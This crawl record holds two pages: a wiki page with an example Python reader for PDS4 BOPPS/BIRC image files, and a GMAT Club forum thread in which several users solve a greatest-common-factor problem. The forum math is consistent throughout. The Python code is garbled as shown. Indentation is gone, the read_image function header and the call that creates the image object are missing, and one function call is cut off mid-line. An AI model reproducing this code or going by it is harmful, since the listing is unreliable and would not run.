URL
stringlengths
15
1.68k
text_list
listlengths
1
199
image_list
listlengths
1
199
metadata
stringlengths
1.19k
3.08k
https://sbnwiki.astro.umd.edu/wiki/index.php?title=Example_Python_Reader_for_PDS4_Images&diff=prev&oldid=1427
[ "# Difference between revisions of \"Example Python Reader for PDS4 Images\"\n\n## Introduction\n\nThis document describes how to use Python to read in an image from a PDS4 data product. The code will not validate the label, but will read the data based on the label keywords. The code below is limited to reading BOPPS BIRC images, but can be used as an example for other arrays.\n\n## Requirements\n\nThis example assumes the user is running Python 2.7, with a recent NumPy package installed. The visualization example uses matplotlib.\n\n## Goal and Method\n\nThe goal is to read in an image from a BOPPS BIRC data product into a Numpy array. We will provide the script with the name of the label, the script will then\n\n1. Open the label.\n2. Find the data product file name.\n3. Determine the Array_2D_Image data type and shape.\n4. Read in the data array.\n5. Return the array.\n\n## Implementation\n\nFor this basic example, we designed the reader as a function in a module named birc. The user calls a single function, birc.read_image(), passing the name of the label as the first argument. The function will load the label using the ElementTree module and find the first Array_2D_Image element to read in. A second function, read_pds4_array(), determines the correct data type and shape, then reads the data from the file. A class specifically designed for PDS4 Array_2D_Image objects, aptly named PDS4_Array_2D_Image, is initialized with the data, the label describing the data, and the local_identifier of the array. The local_identifier is not required, but is present in the BIRC labels, so our class assumes it is included. The class then determines the image orientation. The image is stored as a class attribute data. The class attribute display_data is also provided, which can be used for displaying with the origin in the lower left corner. The code is listed below.\n\n## Example\n\nUsing the birc.py module listed below, this example reads in an image, zeros out the first 10 rows of the array, then displays the data with matplotlib.\n\n```import birc\nimport matplotlib.pyplot as plt\n\n# the image is im.data\n# the image for displaying purposes is im.display_data\n\n# zero out the first 10 rows\nim[:10] = 0\n\n# display the result\nplt.clf()\nplt.imshow(im.display_data, origin='lower')\nplt.draw()\n```\n\n## birc.py\n\n```\"\"\"\nbirc --- Example PDS4 Array_2D_Image reader for BOPPS/BIRC data\n===============================================================\n\nExample\n-------\n\nimport birc\nimport matplotlib.pyplot as plt\n\n# array is im.data\n# array for displaying is im.display_data\n\nplt.clf()\nplt.imshow(im.display_data, origin='lower')\nplt.draw()\n\nClasses\n-------\nPDS4_Array_2D_Image - A PDS4 2D image.\n\nFunctions\n---------\nread_image - Read a BIRC image described by a PDS4 label file.\n\n\"\"\"\n\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\nclass PDS4_Array_2D_Image(object):\n\"\"\"A PDS4 array for 2D images, with limited functionality.\n\nParameters\n----------\ndata : ndarray\nThe data.\nlocal_identifier : string\nThe label's local_identifier for this array.\nlabel : ElementTree\nThe PDS4 label that contains the description of the array.\n\nAttributes\n----------\ndata : ndarray\nSee Parameters.\nlabel : ElementTree\nSee Parameters.\nlocal_identifier : string\nSee Parameters.\n\nhorizontal_axis : int\nThe index of the horizontal axis for display.\nvertical_axis : int\nThe index of the vertical axis for display.\n\ndisplay_data : ndarray\nThe data array rotated into display orientation, assuming the\ndisplay will draw the image with the origin in the lower left\ncorner. The vertical axis will be axis 0, the horizontal axis\nwill be axis 1.\n\n\"\"\"\n\ndef __init__(self, data, local_identifier, label):\nself.data = data\nself.local_identifier = local_identifier\nself.label = label\nself._orient()\n\ndef _orient(self):\n\"\"\"Set object image orientation attributes.\"\"\"\n\n# namespace definitions\nns = {'pds4': 'http://pds.nasa.gov/pds4/pds/v1',\n'disp': 'http://pds.nasa.gov/pds4/disp/v1'}\n\n# find local_identifier in File_Area_Observational\narray = None\nxpath = ('./pds4:File_Area_Observational/pds4:Array_2D_Image/'\n'[pds4:local_identifier]')\nfor e in self.label.findall(xpath, ns):\nthis_local_id = e.find('./pds4:local_identifier', ns).text.strip()\nif this_local_id == self.local_identifier:\narray = e\nbreak\n\nassert array is not None, \"Array_2D_Image with local_identifier == {} not found.\".format(self.local_identifier)\n\n# find display_settings_to_array for local_identifier in\n# Display_Settings\ndisplay_settings = None\nxpath = ('./pds4:Observation_Area/pds4:Discipline_Area/'\n'disp:Display_Settings')\nfor e in self.label.findall(xpath, ns):\nlir = e.find('./disp:Local_Internal_Reference', ns)\nreference = lir.find('./disp:local_identifier_reference', ns).text.strip()\nif reference == self.local_identifier:\ndisplay_settings = e\nbreak\n\nassert display_settings is not None, \"Display_Settings for local_identifier == {} not found.\".format(self.local_identifier)\n\n# determine display directions\ndisplay_dir = e.find('./disp:Display_Direction', ns)\nh = display_dir.find('./disp:horizontal_display_direction', ns)\nv = display_dir.find('./disp:vertical_display_direction', ns)\nself.display_directions = (h.text.strip(), v.text.strip())\n\n# determine horizonal and vertical axes\nhaxis = display_dir.find('./disp:horizontal_display_axis', ns).text.strip()\nfor axis in array.findall('./pds4:Axis_Array', ns):\nif axis.find('./pds4:axis_name', ns).text.strip() == haxis:\nsn = int(axis.find('./pds4:sequence_number', ns).text.strip())\nself.horizontal_axis = sn - 1\n\nvaxis = display_dir.find('./disp:vertical_display_axis', ns).text.strip()\nfor axis in array.findall('./pds4:Axis_Array', ns):\nif axis.find('./pds4:axis_name', ns).text.strip() == vaxis:\nsn = int(axis.find('./pds4:sequence_number', ns).text.strip())\nself.vertical_axis = sn - 1\n\n@property\ndef display_data(self):\n# only need to roll one axis for a 2D image\nim = np.rollaxis(self.data, self.vertical_axis)\nif 'Right to Left' in self.display_directions:\nim = im[:, ::-1]\nif 'Top to Bottom' in self.display_directions:\nim = im[::-1]\nreturn im\n\n\"\"\"Read a BIRC image described by a PDS4 label file.\n\nOnly the first Array_2D_Image is returned, based on BIRC PDS4\nsample data files.\n\nParameters\n----------\nfile_name : string\nThe name of the PDS4 label file describing the BIRC image.\n\nReturns\n-------\nim : PDS4_Array_2D_Image\nThe image\n\nRaises\n------\nNotImplementedError\n\n\"\"\"\nimport os\n\n# namespace definitions\nns = {'pds4': 'http://pds.nasa.gov/pds4/pds/v1'}\n\nlabel = ET.parse(file_name)\n\n# Find the first File_Area_Observational element with an Array_2D_Image\nfind = label.findall(\n'pds4:File_Area_Observational/[pds4:Array_2D_Image]', ns)\n\nif len(find) > 1:\nraise NotImplementedError(\"Multiple Array_2D_Image elements found.\")\nelse:\nfile_area = find\n\nfile_area, './pds4:Array_2D_Image', ns,\ndirname=os.path.dirname(file_name))\n\nreturn PDS4_Array_2D_Image(data, local_identifier, label)\n\nParameters\n----------\nfile_area : ElementTree Element\nThe File_Area_Observational element from the PDS4 label.\nxpath : string\nThe array is described by the element `file_area.find(xpath)`.\nns : dictionary\nNamespace definitions for `file_area.find()`.\ndirname : string\nThe original data label's directory name, used to find the array\nfile.\n\nReturns\n-------\ndata : ndarray\nThe array.\nlocal_identifier : string\nThe local_identifier of the array, or `None` if not present.\n\nRaises\n------\nNotImplementedError\n\n\"\"\"\n\nimport os\n\nfile_name = file_area.find('pds4:File/pds4:file_name', ns).text.strip()\nfile_name = os.path.join(dirname, file_name)\n\narray = file_area.find(xpath, ns)\n\nlocal_identifier = array.find('./pds4:local_identifier', ns).text.strip()\n\n# Examine the data type, and translate it into a numpy dtype\npds4_to_numpy_dtypes = {\n\"IEEE754MSBSingle\": '>f4'\n}\ntry:\nk = array.find('pds4:Element_Array/pds4:data_type', ns).text.strip()\ndtype = np.dtype(pds4_to_numpy_dtypes[k])\nexcept KeyError:\nraise NotImplementedError(\"PDS4 data_type {} not implemented.\".format(k))\n\n# determine the shape\nndim = int(array.find('pds4:axes', ns).text.strip())\nshape = ()\nfor i in range(ndim):\nk = ('./pds4:Axis_Array/[pds4:sequence_number=\"{}\"]/pds4:elements').format(i + 1)\nshape += (int(array.find(k, ns).text.strip()), )\n\n# verify axis order\naxis_index_order = array.find('./pds4:axis_index_order', ns).text.strip()\nassert axis_index_order == 'Last Index Fastest', \"Invalid axis order: {}\".format(axis_index_order)\n\noffset = array.find('./pds4:offset', ns)\nassert offset.attrib['unit'].lower() == 'byte', \"Invalid file offset unit\"\nwith open(file_name, 'r') as inf:\ninf.seek(int(offset.text.strip()))\ndata = np.fromfile(inf, dtype, count=np.prod(shape)).reshape(shape)\n\nreturn data, local_identifier\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5231015,"math_prob":0.6176084,"size":11646,"snap":"2021-43-2021-49","text_gpt3_token_len":2873,"char_repetition_ratio":0.15856382,"word_repetition_ratio":0.34528553,"special_character_ratio":0.2726258,"punctuation_ratio":0.20426123,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9566692,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-01T22:39:25Z\",\"WARC-Record-ID\":\"<urn:uuid:83a78354-2655-4dc1-8167-64ba1273831b>\",\"Content-Length\":\"34379\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f094125c-6d5f-4399-b716-425757ba6d53>\",\"WARC-Concurrent-To\":\"<urn:uuid:a53279d3-95e8-41a4-b6f1-7138771ce6cd>\",\"WARC-IP-Address\":\"129.2.14.91\",\"WARC-Target-URI\":\"https://sbnwiki.astro.umd.edu/wiki/index.php?title=Example_Python_Reader_for_PDS4_Images&diff=prev&oldid=1427\",\"WARC-Payload-Digest\":\"sha1:RRWYTNYM75TBDJ4F27MMFZFE4WE5G3QR\",\"WARC-Block-Digest\":\"sha1:37W5FC7LJY6M7NVJEWSB6OM5JZOT2MB7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964360951.9_warc_CC-MAIN-20211201203843-20211201233843-00148.warc.gz\"}"}
https://gmatclub.com/forum/the-greatest-common-factor-of-16-and-the-positive-integer-n-109870.html?sort_by_oldest=true
[ "GMAT Question of the Day: Daily via email | Daily via Instagram New to GMAT Club? Watch this Video\n\n It is currently 13 Jul 2020, 07:24", null, "### GMAT Club Daily Prep\n\n#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.\n\nCustomized\nfor You\n\nwe will pick new questions that match your level based on your Timer History\n\nTrack\n\nevery week, we’ll send you an estimated GMAT score based on your performance\n\nPractice\nPays\n\nwe will pick new questions that match your level based on your Timer History\n\n#### Not interested in getting valuable practice questions and articles delivered to your email? No problem, unsubscribe here.", null, "", null, "# The greatest common factor of 16 and the positive integer n\n\nAuthor Message\nTAGS:\n\n### Hide Tags\n\nManager", null, "", null, "Joined: 28 Aug 2010\nPosts: 139\nThe greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n9\n59", null, "00:00\n\nDifficulty:", null, "", null, "", null, "75% (hard)\n\nQuestion Stats:", null, "60% (02:20) correct", null, "40% (02:25) wrong", null, "based on 691 sessions\n\n### HideShow timer Statistics\n\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\nA. 3\nB. 14\nC. 30\nD. 42\nE. 70\nVeritas Prep GMAT Instructor", null, "V\nJoined: 16 Oct 2010\nPosts: 10666\nLocation: Pune, India\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n14\n5\najit257 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\n3\n\n14\n\n30\n\n42\n\n70\n\ni am not so sure about the oa.\n\nGCF (n, 16) = 4\nThis means 4 is a factor of n but 8 and 16 are not. (If 8 were a factor of n too, the GCF would have been 8. Similarly for 16)\n\nGCF (n, 45) = 3\nThis means 3 is a factor of n but 9 and 5 are not. Same logic as above.\n\n210 = 2*3*5*7\nn has 4 and 3 as factors and it doesn't have 5 as a factor.\nso GCF of n and 210 could be 6 (if 7 is not a factor of n) or 42 (if 7 is a factor of n)\n\nNote: 3 is definitely not the GCF of n and 210 because they definitely have 3*2 in common. So GCF has to be at least 6.\n_________________\nKarishma\nVeritas Prep GMAT Instructor\n\nDirector", null, "", null, "Status: -=Given to Fly=-\nJoined: 04 Jan 2011\nPosts: 776\nLocation: India\nSchools: Haas '18, Kelley '18\nGMAT 1: 650 Q44 V37\nGMAT 2: 710 Q48 V40\nGMAT 3: 750 Q51 V40\nGPA: 3.5\nWE: Education (Education)\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n5\n4\nEDIT.... My explanation was wrong :p [Correcting it]\n\nCorrected Version:\n\nLet's try the Prime Box Approach\n\nPrime Box is simply a collection of all prime factors of a given number!\n\n(1) Prime Box of 16 = |2, 2, 2, 2|\n(2) Prime Box of 45 = |3, 3, 5|\n\n(3) Prime Box of n = |2, 2, 3....|\n(4) Prime Box of 210 = |2, 5, 3, 7|\n\nFrom 3 and 4:\nThe GCF of n and 210 must be a multiple of 6.\n\nSo we can eliminate A, B and E!\n\nFrom 2 and 3:\nn is not a multiple of 5. If it were, the GCF of n and 45 would have been 15!\nSo we can eliminate C\n\nThe only remaining choice is 'D'\n_________________\n\nOriginally posted by AmrithS on 22 Feb 2011, 18:36.\nLast edited by AmrithS on 22 Feb 2011, 18:51, edited 2 times in total.\n##### General Discussion\nManager", null, "", null, "Joined: 28 Aug 2010\nPosts: 139\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\nthanks Karishma ...my doubt is exactly the same thing but for 16 ..how come 42 is correct if n and 16 have a gcf of 4\nVeritas Prep GMAT Instructor", null, "V\nJoined: 16 Oct 2010\nPosts: 10666\nLocation: Pune, India\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n1\najit257 wrote:\nthanks Karishma ...my doubt is exactly the same thing but for 16 ..how come 42 is correct if n and 16 have a gcf of 4\n\nThat is because 210 has only one 2. Even though n has a 4 as factor, 210 does not. Therefore GCF of n and 210 does not have 4 as a factor. Does it make sense now?\n_________________\nKarishma\nVeritas Prep GMAT Instructor\n\nManager", null, "", null, "Joined: 28 Aug 2010\nPosts: 139\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\nso lets say if another choice was given as 6 then what could have been the ans or it would not be that close.\nVeritas Prep GMAT Instructor", null, "V\nJoined: 16 Oct 2010\nPosts: 10666\nLocation: Pune, India\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\najit257 wrote:\nso lets say if another choice was given as 6 then what could have been the ans or it would not be that close.\n\nThen there would have been two correct options: 6 and 42. Either can be the GCF of n and 210 depending on what exactly n is.\nGMAT never has 2 correct options and hence such a scenario is not possible. Only one of 6 and 42 would be in the answer choices.\n_________________\nKarishma\nVeritas Prep GMAT Instructor\n\nMath Expert", null, "V\nJoined: 02 Sep 2009\nPosts: 65238\n\n### Show Tags\n\n4\nrosgmat wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\na) 3\nb) 14\nc) 30\nd) 42\ne) 70\n\nThe greatest common factor of 2^4=16 and n is 4 --> n is a multiple of 2^2=4 but not the higher powers of 2, for example 2^3=8 or 2^4=16, because if it were then the greatest common factor of 16 and n would be more than 4;\n\nThe greatest common factor of 3^2*5=45 and n is 3 --> n is a multiple of 3 but not the higher powers of 3 and not 5, because if it were then the greatest common factor of 3^2*5=45 and n would be more than 3;\n\nSo, n is a multiple of 2^2*3=12, not a multiple of higher powers of 2 or 3, and not a multiple of 5 (so n=12x where x could be any positive integer but 2, 3, or 5). Now, as 210=2*3*5*7 then the greatest common factor of n and 210 could be 6 or 6*7=42 (if 7 is a factor of n).\n\n_________________\nManager", null, "", null, "Joined: 17 Feb 2011\nPosts: 139\nConcentration: Real Estate, Finance\nSchools: MIT (Sloan) - Class of 2014\nGMAT 1: 760 Q50 V44\n\n### Show Tags\n\n3\nYou can do the prime boxes.\n\nPrime box of 16: 2, 2, 2, 2\nPrime box of 45: 3, 3, 5\n\nPrime box of 210: 2, 5, 3, 7\n\nSo, n has at least two 2's and one 3, but n hasn't got any 5. Now, checking alternatives:\nA) wrong, as n and 210 share at least one 2 and one 3.\nB) wrong again, no 3 in 14.\nC) wrong, as 30 has a 5\nD) correct. 42 prime box is 2, 3, 7, so it meets all requirements.\nE) wrong, 70 prime box has 2, 7 and 5\nIntern", null, "", null, "Joined: 09 Jul 2012\nPosts: 22\nLocation: India\nConcentration: Strategy, Sustainability\nGMAT 1: 700 Q50 V34\n\n### Show Tags\n\n1\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\nSenior Manager", null, "", null, "Joined: 23 Mar 2011\nPosts: 392\nLocation: India\nGPA: 2.5\nWE: Operations (Hospitality and Tourism)\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n2\nmun23 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\n(A)3\n(B)14\n(C)30\n(D)42\n(E)70\n\nNeed easy explanation to solve it quickly\n\nHi, let me try to explain in simpler way:\n\nGCF = 4 = 2^2\n16 = 2^4\nthat means prime box of n = 2^2 , ? ? ?\n\nGCF = 3\n45 = 3^2*5\nthat means prime box of n = 3^1, ? ? ?\n\nOverall prime box of n = 2^2, 3^1, ???\n\nNow, 210 = 3*7*5*2\nfrom above we know the prime factor and powers of n (not complete ??)\ntherefore GCF = 3^1 * 2^1 * 7^1 (not 5 - we have seen above, but at least a 7 is possible)\nThus at least a GCF of 42 is possible here\n\nHope this helps\nManager", null, "", null, "Joined: 09 Apr 2013\nPosts: 185\nLocation: United States\nConcentration: Finance, Economics\nGMAT 1: 710 Q44 V44\nGMAT 2: 740 Q48 V44\nGPA: 3.1\nWE: Sales (Mutual Funds and Brokerage)\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n1\nSimple explanation?\n\nFirst, do a factor tree for each number.\n\nYou'll see that 5 can't be a factor of N (otherwise it would have been the highest factor between N and 45).\n\nThe highest factor that could theoretically exist between N and 210 is therefore all of the factors of 210 besides those we've ruled out. 210 is factored to 2 * 3 * 5 * 7. we've ruled out 5, so 2 * 3 * 7 = 42. Answer is D.\n\nIf the question asked \"the highest factor that we KNOW exists\" rather than \"COULD\" exist, the answer would be six since 2 and 3 are both factors of N, as well as of 210.\nManager", null, "", null, "B\nJoined: 10 Mar 2014\nPosts: 177\n\n### Show Tags\n\nBunuel wrote:\nrosgmat wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\na) 3\nb) 14\nc) 30\nd) 42\ne) 70\n\nThe greatest common factor of 2^4=16 and n is 4 --> n is a multiple of 2^2=4 but not the higher powers of 2, for example 2^3=8 or 2^4=16, because if it were then the greatest common factor of 16 and n would be more than 4;\n\nThe greatest common factor of 3^2*5=45 and n is 3 --> n is a multiple of 3 but not the higher powers of 3 and not 5, because if it were then the greatest common factor of 3^2*5=45 and n would be more than 3;\n\nSo, n is a multiple of 2^2*3=12, not a multiple of higher powers of 2 or 3, and not a multiple of 5 (so n=12x where x could be any positive integer but 2, 3, or 5). Now, as 210=2*3*5*7 then the greatest common factor of n and 210 could be 6 or 6*7=42 (if 7 is a factor of n).\n\nHi Bunnel,\n\nI have resolved this till n is a multiple of 2^2*3=12\n\nwhy we are not considering 5 but we are considering 7.\n\nThanks\nMath Expert", null, "V\nJoined: 02 Sep 2009\nPosts: 65238\n\n### Show Tags\n\nPathFinder007 wrote:\nBunuel wrote:\nrosgmat wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\na) 3\nb) 14\nc) 30\nd) 42\ne) 70\n\nThe greatest common factor of 2^4=16 and n is 4 --> n is a multiple of 2^2=4 but not the higher powers of 2, for example 2^3=8 or 2^4=16, because if it were then the greatest common factor of 16 and n would be more than 4;\n\nThe greatest common factor of 3^2*5=45 and n is 3 --> n is a multiple of 3 but not the higher powers of 3 and not 5, because if it were then the greatest common factor of 3^2*5=45 and n would be more than 3;\n\nSo, n is a multiple of 2^2*3=12, not a multiple of higher powers of 2 or 3, and not a multiple of 5 (so n=12x where x could be any positive integer but 2, 3, or 5). Now, as 210=2*3*5*7 then the greatest common factor of n and 210 could be 6 or 6*7=42 (if 7 is a factor of n).\n\nHi Bunnel,\n\nI have resolved this till n is a multiple of 2^2*3=12\n\nwhy we are not considering 5 but we are considering 7.\n\nThanks\n\nNotice that the GCF of 45 (a multiple of 5) and n is 3 (not a multiple of 5). This means that n itself cannot be a multiple of 5.\n\nAs for 7: we know for sure that 2 and 3 are factors of n and 5 is not a factor of n. We know nothing about its other primes, so any prime greater than 5 theoretically can be a factor of n.\n_________________\nSVP", null, "", null, "Status: The Best Or Nothing\nJoined: 27 Dec 2012\nPosts: 1706\nLocation: India\nConcentration: General Management, Technology\nWE: Information Technology (Computer Software)\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n1\n16........ n .......................... n ....... 45\n\nGCF = 4 ................................. GCF = 3\n\nSo n may be either 4 * 3 = 12 or a multiple of 12 to satisfy the GCF values given.\n\n210 = 7 * 2 * 5 * 3\n\n2, 3 & 5 are associated with 16 & 45. Including them in calculations will disturb the already provided GCF values\n\nOnly 7 stands out.\n\nSo 12 * 7 = 84\n\nGCF of 84 & 210 = 42\n\nDirector", null, "", null, "S\nJoined: 17 Dec 2012\nPosts: 635\nLocation: India\nThe greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n1\nn has to be a multiple of (2*2)*3 = 12\nA common factor between 210= (2*3*5*7) and multiple of 12 is 2*3=6\nSo the G.C.F of n and 210 has to be a multiple of 6\nThe two choices that are multiples of 6 are 30 and 42.\nBur n is not a multiple of 5 .So 30 can be ruled out and the answer is 42.\n_________________\nSrinivasan Vaidyaraman\nMagical Logicians\nHolistic and Holy Approach\nCurrent Student", null, "B\nJoined: 23 Dec 2013\nPosts: 132\nLocation: United States (CA)\nGMAT 1: 710 Q45 V41\nGMAT 2: 760 Q49 V44\nGPA: 3.76\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\n1\n1\najit257 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\nA. 3\nB. 14\nC. 30\nD. 42\nE. 70\n\nThis problem works best if you break it down into pieces with Venn diagrams.\n\n16 and n have a GCF of 4 = 2^2. That means n has at least two 2's as factors.\n\n45 and n share one factor: 3. That means n has at least one 3 and two 2's (3*2^2).\n\nThe next step is to break down 210 into 2*3*7*5. 5 is not a possible factor of n because it would've been a GCF with 45 and n. But 7 could be a common divisor because it's not expressly forbidden anywhere. So the GCF in this case is 2*3*7 = 42.\nGMATH Teacher", null, "P\nStatus: GMATH founder\nJoined: 12 Oct 2010\nPosts: 938\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\najit257 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\nA. 3\nB. 14\nC. 30\nD. 42\nE. 70\n\n$$?\\,\\,\\,:\\,\\,\\,GCF\\left( {n\\,,2 \\cdot 3 \\cdot 5 \\cdot 7} \\right)\\,\\,\\underline {{\\rm{could}}\\,\\,{\\rm{be}}}$$\n\n$$n \\ge 1\\,\\,\\,{\\mathop{\\rm int}}$$\n\n$$GCF\\left( {{2^4},n} \\right) = {2^2}\\,\\,\\,\\, \\Rightarrow \\,\\,\\,\\,\\,\\left\\{ \\matrix{ {n \\over {{2^2}}} = {\\mathop{\\rm int}} \\hfill \\cr {n \\over {{2^{\\, \\ge \\,3}}}} \\ne {\\mathop{\\rm int}} \\hfill \\cr} \\right.$$\n\n$$GCF\\left( {{3^2} \\cdot 5,n} \\right) = 3\\,\\,\\,\\, \\Rightarrow \\,\\,\\,\\,\\,\\left\\{ \\matrix{ {n \\over 3} = {\\mathop{\\rm int}} \\hfill \\cr {n \\over {{3^{\\, \\ge \\,2}}}} \\ne {\\mathop{\\rm int}} \\,\\,\\,\\,\\,;\\,\\,\\,{n \\over 5} \\ne {\\mathop{\\rm int}} \\,\\, \\hfill \\cr} \\right.$$\n\n$$? = {2^1} \\cdot {3^1} \\cdot {7^{0\\,{\\rm{or}}\\,1}}\\,\\,\\,\\,\\,\\mathop \\Rightarrow \\limits^{{\\rm{alternatives}}\\,!} \\,\\,\\,\\,42\\,\\,\\,\\,\\,\\,\\left( D \\right)$$\n\nThis solution follows the notations and rationale taught in the GMATH method.\n\nRegards,\nFabio.\n_________________\nFabio Skilnik :: GMATH method creator (Math for the GMAT)\nOur high-level \"quant\" preparation starts here: https://gmath.net\nTarget Test Prep Representative", null, "V\nStatus: Founder & CEO\nAffiliations: Target Test Prep\nJoined: 14 Oct 2015\nPosts: 11096\nLocation: United States (CA)\nRe: The greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\najit257 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\nA. 3\nB. 14\nC. 30\nD. 42\nE. 70\n\nIf the greatest common factor (GCF) of 16 and n is 4, n could be 4, 12, 20, 28, 36, etc. In other words, n is an odd multiple of 4.\n\nSince the GCF of 45 and n is 3, and since 45 and 4 have no common factor other than 1, n must be a multiple of 3 x 4 = 12. However, since n is an odd multiple of 4, n actually has to be an odd multiple of 12 also.\n\nIf n = 12, we see that GCF(45, 12) = 3 and GCF(12, 210) = 6. However, 6 is not one of the choices.\n\nIf n = 36, we see that GCF(45, 36) = 9, but GCF(45, n) is supposed to be 3. So n can’t be 36.\n\nIf n = 60, we see that GCF(45, 60) = 15, but GCF(45, n) is supposed to be 3. So n can’t be 60.\n\nIf n = 84, we see that GCF(45, 84) = 3 and GCF(84, 210) = 42. We see that 42 is one of the choices.\n\n_________________\n\n# Scott Woodbury-Stewart\n\nFounder and CEO\n\[email protected]\n\n214 REVIEWS\n\n5-STARS RATED ONLINE GMAT QUANT SELF STUDY COURSE\n\nNOW WITH GMAT VERBAL (BETA)\n\nSee why Target Test Prep is the top rated GMAT quant course on GMAT Club. Read Our Reviews\n\nCEO", null, "", null, "V\nJoined: 03 Jun 2019\nPosts: 3243\nLocation: India\nGMAT 1: 690 Q50 V34", null, "WE: Engineering (Transportation)\nThe greatest common factor of 16 and the positive integer n  [#permalink]\n\n### Show Tags\n\najit257 wrote:\nThe greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3. Which of the following could be the greatest common factor of n and 210?\n\nA. 3\nB. 14\nC. 30\nD. 42\nE. 70\n\nGiven: The greatest common factor of 16 and the positive integer n is 4, and the greatest common factor of n and 45 is 3.\n\nAsked: Which of the following could be the greatest common factor of n and 210?\n\nn = 4k ; where k is not a multiple of 2\n45 = 3^2*5\nn = 3m; where m is not a multiple of 3 or 5\n210 = 2*3*5*7\nn = 4*3*k ; where k is any prime other than 2,3,or 5\n\ngcd (n,210) = 2*3 = 6 or 2*3*7 = 42\n\nIMO D\n_________________\nKinshook Chaturvedi\nEmail: [email protected]", null, "The greatest common factor of 16 and the positive integer n   [#permalink] 29 Mar 2020, 05:56\n\n# The greatest common factor of 16 and the positive integer n", null, "", null, "" ]
[ null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/profile/close.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/profile/close.png", null, "https://gmatclub.com/forum/styles/gmatclub_light/theme/images/search/close.png", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_play.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_difficult_blue.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_difficult_blue.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_difficult_blue.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://cdn.gmatclub.com/cdn/files/forum/styles/gmatclub_light/theme/images/viewtopic/timer_separator.png", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_116290.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_5.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_129703.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_116290.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/no_avatar.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_116290.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_73391.jpg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/ranks/rank_phpbb_3.svg", null, "https://cdn.gmatclub.com/cdn/files/forum/images/avatars/upload/avatar_142300.png", null, 